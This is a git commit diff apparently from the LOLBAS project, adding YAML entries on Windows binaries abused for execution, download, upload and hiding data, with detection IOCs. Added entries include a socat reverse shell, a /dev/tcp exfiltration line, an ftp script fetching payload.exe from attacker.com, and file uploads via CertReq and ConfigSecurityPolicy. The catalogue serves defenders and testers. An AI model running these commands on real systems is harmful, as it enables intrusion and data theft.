Merge pull request #1 from LOLBAS-Project/master

Updating repository
This commit is contained in:
jesgal 2020-10-29 09:01:46 +01:00 committed by GitHub
commit 6e5bd0e9e1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
39 changed files with 1072 additions and 142 deletions

View File

@ -19,7 +19,7 @@ Code_Sample:
- Code: - Code:
Detection: Detection:
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration
- IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs - IOC: Changes to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs
- IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware
Resources: Resources:
- Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ - Link: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

View File

@ -12,6 +12,22 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 OperatingSystem: Windows 10
- Command: bash.exe -c "socat tcp-connect:192.168.1.9:66 exec:sh,pty,stderr,setsid,sigint,sane"
Description: Executes a reverseshell
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: bash.exe -c 'cat file_to_exfil.zip > /dev/tcp/192.168.1.10/24'
Description: Exfiltrate data
Usecase: Performs execution of specified file, can be used as a defensive evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10
- Command: bash.exe -c calc.exe - Command: bash.exe -c calc.exe
Description: Executes calc.exe from bash.exe Description: Executes calc.exe from bash.exe
Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. Usecase: Performs execution of specified file, can be used to bypass Application Whitelisting.
@ -32,4 +48,6 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Alex Ionescu - Person: Alex Ionescu
Handle: '@aionescu' Handle: '@aionescu'
- Person: Asif Matadar
Handle: '@d1r4c'
--- ---

View File

@ -0,0 +1,36 @@
---
Name: CertReq.exe
Description: Used for requesting and managing certificates
Author: 'David Middlehurst'
Created: '2020-07-07'
Commands:
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Description: Save the response from a HTTP POST to the endpoint https://example.org/ as output.txt in the current directory
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: CertReq -Post -config https://example.org/ c:\windows\win.ini and show response in terminal
Description: Send the file c:\windows\win.ini to the endpoint https://example.org/ via HTTP POST
Usecase: Upload
Category: Upload
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path:
- Path: C:\Windows\System32\certreq.exe
- Path: C:\Windows\SysWOW64\certreq.exe
Code_Sample:
- Code:
Detection:
- IOC: certreq creates new files
- IOC: certreq makes POST requests
Resources:
- Link: https://dtm.uk/certreq
Acknowledgement:
- Person: David Middlehurst
Handle: '@dtmsecurity'
---

View File

@ -25,8 +25,8 @@ Commands:
Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream
Category: ADS Category: ADS
Privileges: User Privileges: User
MitreID: T1105 MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/techniques/T1096
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil -encode inputFileName encodedOutputFileName - Command: certutil -encode inputFileName encodedOutputFileName
Description: Command to encode a file using Base64 Description: Command to encode a file using Base64
@ -44,6 +44,14 @@ Commands:
MitreID: T1140 MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140 MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: certutil --decodehex encoded_hexadecimal_InputFileName
Description: Command to decode a hexadecimal-encoded file decodedOutputFileName
Usecase: Decode files to evade defensive measures
Category: Decode
Privileges: User
MitreID: T1140
MitreLink: https://attack.mitre.org/wiki/Technique/T1140
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\certutil.exe - Path: C:\Windows\System32\certutil.exe
- Path: C:\Windows\SysWOW64\certutil.exe - Path: C:\Windows\SysWOW64\certutil.exe
@ -64,4 +72,5 @@ Acknowledgement:
Handle: '@Moriarty_Meng' Handle: '@Moriarty_Meng'
- Person: egre55 - Person: egre55
Handle: '@egre55' Handle: '@egre55'
- Person: Lior Adar
--- ---

View File

@ -0,0 +1,32 @@
---
Name: ConfigSecurityPolicy.exe
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.
Author: 'Ialle Teixeira'
Created: '04/09/2020'
Commands:
- Command: ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
Description: Upload file, credentials or data exfiltration in general
Usecase: Upload file
Category: Upload
Privileges: User
MitreID: T1567
MitreLink: https://attack.mitre.org/techniques/T1567/
OperatingSystem: Windows 10
Full_Path:
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
Code_Sample:
- Code:
Detection:
- IOC: ConfigSecurityPolicy storing data into alternate data streams.
- IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.
- IOC: User Agent is "MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
Resources:
- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads
- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads
- Link: https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor
- Link: https://twitter.com/NtSetDefault/status/1302589153570365440?s=20
Acknowledgement:
- Person: Ialle Teixeira
Handle: '@NtSetDefault'
---

View File

@ -0,0 +1,27 @@
---
Name: Desktopimgdownldr.exe
Description: Windows binary used to configure lockscreen/desktop image
Author: Gal Kristal
Created: 28/06/2020
Commands:
- Command: set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr
Description: Downloads the file and sets it as the computer's lockscreen
Usecase: Download arbitrary files from a web server
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows 10
Full_Path:
- Path: c:\windows\system32\desktopimgdownldr.exe
Code_Sample:
- Code:
Detection:
- IOC: desktopimgdownldr.exe that creates non-image file
- IOC: Change of HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP\LockScreenImageUrl
Resources:
- Link: https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/
Acknowledgement:
- Person: Gal Kristal
Handle: '@gal_kristal'
---

38
yml/OSBinaries/Diantz.yml Normal file
View File

@ -0,0 +1,38 @@
---
Name: Diantz.exe
Description: Binary that package existing files into a cabinet (.cab) file
Author: 'Tamir Yehuda'
Created: '08/08/2020'
Commands:
- Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an Alternate Data Stream.
Category: ADS
Privileges: User
MitreID: T1096
MitreLink: https://attack.mitre.org/wiki/Technique/T1096
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine.
Usecase: Download and compress into a cab file.
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Full_Path:
- Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe
Code_Sample:
- Code:
Detection:
- IOC: diantz storing data into alternate data streams.
- IOC: diantz getting a file from a remote machine or the internet.
Resources:
- Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz
Acknowledgement:
- Person: Tamir Yehuda
Handle: '@tim8288'
- Person: Hai Vaknin
Handle: '@vakninhai'
---

View File

@ -0,0 +1,39 @@
---
Name: Explorer.exe
Description: Binary used for managing files and system components within Windows
Author: 'Jai Minton'
Created: '2020-06-24'
Commands:
- Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows XP, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: explorer.exe C:\Windows\System32\notepad.exe
Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
Usecase: Performs execution of specified file with explorer parent process breaking the process tree, can be used for defense evasion.
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 10 (Tested)
Full_Path:
- Path: C:\Windows\explorer.exe
- Path: C:\Windows\SysWOW64\explorer.exe
Code_Sample:
- Code:
Detection:
- IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.
Resources:
- Link: https://twitter.com/CyberRaiju/status/1273597319322058752?s=20
- Link: https://twitter.com/bohops/status/1276356245541335048
- Link: https://twitter.com/bohops/status/986984122563391488
Acknowledgement:
- Person: Jai Minton
Handle: '@CyberRaiju'
- Person: Jimmy
Handle: '@bohops'
---

View File

@ -28,6 +28,14 @@ Commands:
MitreID: T1105 MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105 MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: extrac32.exe /C C:\Windows\System32\calc.exe C:\Users\user\Desktop\calc.exe
Description: Command for copying calc.exe to another folder
Usecase: Copy file
Category: Copy
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\extrac32.exe - Path: C:\Windows\System32\extrac32.exe
- Path: C:\Windows\SysWOW64\extrac32.exe - Path: C:\Windows\SysWOW64\extrac32.exe
@ -44,4 +52,8 @@ Acknowledgement:
Handle: '@egre55' Handle: '@egre55'
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Hai Vaknin(Lux
Handle: '@VakninHai'
- Person: Tamir Yehuda
Handle: '@tim8288'
--- ---

View File

@ -12,6 +12,14 @@ Commands:
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
Description: Download
Usecase: Spawn new process using ftp.exe. Ftp.exe downloads the binary.
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Full_Path: Full_Path:
- Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\System32\ftp.exe
- Path: C:\Windows\SysWOW64\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe
@ -23,6 +31,7 @@ Resources:
- Link: https://twitter.com/0xAmit/status/1070063130636640256 - Link: https://twitter.com/0xAmit/status/1070063130636640256
- Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
- Link: https://ss64.com/nt/ftp.html - Link: https://ss64.com/nt/ftp.html
- Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'

View File

@ -0,0 +1,179 @@
---
Name: GfxDownloadWrapper.exe
Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
Author: Jesus Galvez
Created: Jesus Galvez
Commands:
- Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
Usecase: Download file from internet
Category: Download
Privileges: User
MitreID: T1105
MitreLink: https://attack.mitre.org/techniques/T1105/
OperatingSystem: Windows 10
Full_Path:
- Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_0e9c57ae3396e055\
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_209bd95d56b1ac2d\
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_3fa2a843f8b7f16d\
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_85c860f05274baa0\
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_f7412e3e3404de80\
- Path: c:\windows\system32\driverstore\filerepository\cui_comp.inf_amd64_feb9f1cf05b0de58\
- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_0219cc1c7085a93f\
- Path: c:\windows\system32\driverstore\filerepository\cui_component.inf_amd64_df4f60b1cae9b14a\
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_16eb18b0e2526e57\
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_1c77f1231c19bc72\
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_31c60cc38cfcca28\
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_82f69cea8b2d928f\
- Path: c:\windows\system32\driverstore\filerepository\cui_dc_comp.inf_amd64_b4d94f3e41ceb839\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0606619cc97463de\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_0e95edab338ad669\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_22aac1442d387216\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2461d914696db722\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_29d727269a34edf5\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_2caf76dbce56546d\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_353320edb98da643\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_4ea0ed0af1507894\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_56a48f4f1c2da7a7\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_64f23fdadb76a511\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_668dd0c6d3f9fa0e\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6be8e5b7f731a6e5\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6dad7e4e9a8fa889\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_6df442103a1937a4\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_767e7683f9ad126c\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_8644298f665a12c4\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_868acf86149aef5d\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_92cf9d9d84f1d3db\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_93239c65f222d453\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_9de8154b682af864\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_a7428663aca90897\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_ad7cb5e55a410add\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_afbf41cf8ab202d7\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_d193c96475eaa96e\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_db953c52208ada71\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e7523682cc7528cc\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_e9f341319ca84274\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f3a64c75ee4defb7\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch.inf_amd64_f51939e52b944f4b\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_4938423c9b9639d7\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_c8e108d4a62c59d5\
- Path: c:\windows\system32\driverstore\filerepository\cui_dch_comp.inf_amd64_deecec7d232ced2b\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_01ee1299f4982efe\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_02edfc87000937e4\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0541b698fc6e40b0\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0707757077710fff\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0b3e3ed3ace9602a\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_0cff362f9dff4228\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_16ed7d82b93e4f68\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1a33d2f73651d989\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1aca2a92a37fce23\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1af2dd3e4df5fd61\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_1d571527c7083952\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_23f7302c2b9ee813\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_24de78387e6208e4\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_250db833a1cd577e\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_25e7c5a58c052bc5\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_28d80681d3523b1c\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_2dda3b1147a3a572\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_31ba00ea6900d67d\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_329877a66f240808\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_42af9f4718aa1395\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4645af5c659ae51a\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48c2e68e54c92258\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_48e7e903a369eae2\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_491d20003583dabe\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_4b34c18659561116\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_51ce968bf19942c2\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_555cfc07a674ecdd\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_561bd21d54545ed3\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_579a75f602cc2dce\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_57f66a4f0a97f1a3\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_587befb80671fb38\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_62f096fe77e085c0\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6ae0ddbb4a38e23c\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6bb02522ea3fdb0d\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_6d34ac0763025a06\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_712b6a0adbaabc0a\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_78b09d9681a2400f\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_842874489af34daa\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_88084eb1fe7cebc3\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_89033455cb08186f\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8a9535cd18c90bc3\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_8c1fc948b5a01c52\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_9088b61921a6ff9f\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_90f68cd0dc48b625\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_95cb371d046d4b4c\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_a58de0cf5f3e9dca\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_abe9d37302f8b1ae\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_acb3edda7b82982f\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_aebc5a8535dd3184\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b5d4c82c67b39358\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_b846bbf1e81ea3cf\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_babb2e8b8072ff3b\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_bc75cebf5edbbc50\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_be91293cf20d4372\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c11f4d5f0bc4c592\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4e5173126d31cf0\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c4f600ffe34acc7b\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c8634ed19e331cda\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_c9081e50bcffa972\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_ceddadac8a2b489e\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d4406f0ad6ec2581\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d5877a2e0e6374b6\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_d8ca5f86add535ef\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_e8abe176c7b553b5\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_eabb3ac2c517211f\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_f8d8be8fea71e1a0\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe5e116bb07c0629\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64.inf_amd64_fe73d2ebaa05fb95\
- Path: c:\windows\system32\driverstore\filerepository\igdlh64_kbl_kit127397.inf_amd64_e1da8ee9e92ccadb\
- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_364f43f2a27f7bd7\
- Path: c:\windows\system32\driverstore\filerepository\k127153.inf_amd64_3f3936d8dec668b8\
- Path: c:\windows\system32\driverstore\filerepository\k127793.inf_amd64_3ab7883eddccbf0f\
- Path: c:\windows\system32\driverstore\filerepository\ki129523.inf_amd64_32947eecf8f3e231\
- Path: c:\windows\system32\driverstore\filerepository\ki126950.inf_amd64_fa7f56314967630d\
- Path: c:\windows\system32\driverstore\filerepository\ki126951.inf_amd64_94804e3918169543\
- Path: c:\windows\system32\driverstore\filerepository\ki126973.inf_amd64_06dde156632145e3\
- Path: c:\windows\system32\driverstore\filerepository\ki126974.inf_amd64_9168fc04b8275db9\
- Path: c:\windows\system32\driverstore\filerepository\ki127005.inf_amd64_753576c4406c1193\
- Path: c:\windows\system32\driverstore\filerepository\ki127018.inf_amd64_0f67ff47e9e30716\
- Path: c:\windows\system32\driverstore\filerepository\ki127021.inf_amd64_0d68af55c12c7c17\
- Path: c:\windows\system32\driverstore\filerepository\ki127171.inf_amd64_368f8c7337214025\
- Path: c:\windows\system32\driverstore\filerepository\ki127176.inf_amd64_86c658cabfb17c9c\
- Path: c:\windows\system32\driverstore\filerepository\ki127390.inf_amd64_e1ccb879ece8f084\
- Path: c:\windows\system32\driverstore\filerepository\ki127678.inf_amd64_8427d3a09f47dfc1\
- Path: c:\windows\system32\driverstore\filerepository\ki127727.inf_amd64_cf8e31692f82192e\
- Path: c:\windows\system32\driverstore\filerepository\ki127807.inf_amd64_fc915899816dbc5d\
- Path: c:\windows\system32\driverstore\filerepository\ki127850.inf_amd64_6ad8d99023b59fd5\
- Path: c:\windows\system32\driverstore\filerepository\ki128602.inf_amd64_6ff790822fd674ab\
- Path: c:\windows\system32\driverstore\filerepository\ki128916.inf_amd64_3509e1eb83b83cfb\
- Path: c:\windows\system32\driverstore\filerepository\ki129407.inf_amd64_f26f36ac54ce3076\
- Path: c:\windows\system32\driverstore\filerepository\ki129633.inf_amd64_d9b8af875f664a8c\
- Path: c:\windows\system32\driverstore\filerepository\ki129866.inf_amd64_e7cdca9882c16f55\
- Path: c:\windows\system32\driverstore\filerepository\ki130274.inf_amd64_bafd2440fa1ffdd6\
- Path: c:\windows\system32\driverstore\filerepository\ki130350.inf_amd64_696b7c6764071b63\
- Path: c:\windows\system32\driverstore\filerepository\ki130409.inf_amd64_0d8d61270dfb4560\
- Path: c:\windows\system32\driverstore\filerepository\ki130471.inf_amd64_26ad6921447aa568\
- Path: c:\windows\system32\driverstore\filerepository\ki130624.inf_amd64_d85487143eec5e1a\
- Path: c:\windows\system32\driverstore\filerepository\ki130825.inf_amd64_ee3ba427c553f15f\
- Path: c:\windows\system32\driverstore\filerepository\ki130871.inf_amd64_382f7c369d4bf777\
- Path: c:\windows\system32\driverstore\filerepository\ki131064.inf_amd64_5d13f27a9a9843fa\
- Path: c:\windows\system32\driverstore\filerepository\ki131176.inf_amd64_fb4fe914575fdd15\
- Path: c:\windows\system32\driverstore\filerepository\ki131191.inf_amd64_d668106cb6f2eae0\
- Path: c:\windows\system32\driverstore\filerepository\ki131622.inf_amd64_0058d71ace34db73\
- Path: c:\windows\system32\driverstore\filerepository\ki132032.inf_amd64_f29660d80998e019\
- Path: c:\windows\system32\driverstore\filerepository\ki132337.inf_amd64_223d6831ffa64ab1\
- Path: c:\windows\system32\driverstore\filerepository\ki132535.inf_amd64_7875dff189ab2fa2\
- Path: c:\windows\system32\driverstore\filerepository\ki132544.inf_amd64_b8c1f31373153db4\
- Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
- Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
Detection:
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
Resources:
